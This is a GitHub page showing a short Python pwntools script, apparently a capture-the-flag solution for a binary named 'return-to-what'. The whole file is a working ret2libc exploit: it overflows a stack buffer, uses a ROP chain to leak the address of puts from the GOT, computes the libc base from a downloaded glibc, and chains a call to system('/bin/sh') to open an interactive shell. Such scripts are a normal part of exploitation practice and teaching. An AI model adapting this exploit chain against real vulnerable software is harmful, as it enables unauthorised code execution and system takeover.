-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsample_pwn2.py
55 lines (36 loc) · 1012 Bytes
/
sample_pwn2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/usr/bin/env python
from pwn import *
from pprint import pprint
context.arch = 'amd64'
offset = 56
elf = ELF("./return-to-what")
p = elf.process()
rop = ROP(elf)
rop.call(elf.symbols["puts"],[elf.got['puts']])
rop.call(elf.symbols["vuln"])
print(p.recvuntil("\n"))
print(p.recvuntil("\n"))
payload = [
b"A" * offset,
rop.chain()
]
payload = b"".join(payload)
p.sendline(payload)
puts = u64(p.recvuntil("\n").rstrip().ljust(8, b'\x00'))
log.info(f"puts found at {hex(puts)}")
# p.interactive()
# Get the above puts address and check in libc database for puts with the hex value
# We can download the glibc from libc database
libc = ELF("libc6_2.27-3ubuntu1_amd64.so")
libc.address = puts - libc.symbols["puts"] # Must have 3 trailing zeros
rop = ROP(libc)
rop.call("puts", [next(libc.search(b"/bin/sh\x00"))])
rop.call("system", [next(libc.search(b"/bin/sh\x00"))])
rop.call("exit")
payload = [
b"A" * offset,
rop.chain()
]
payload = b"".join(payload)
p.sendline(payload)
p.interactive()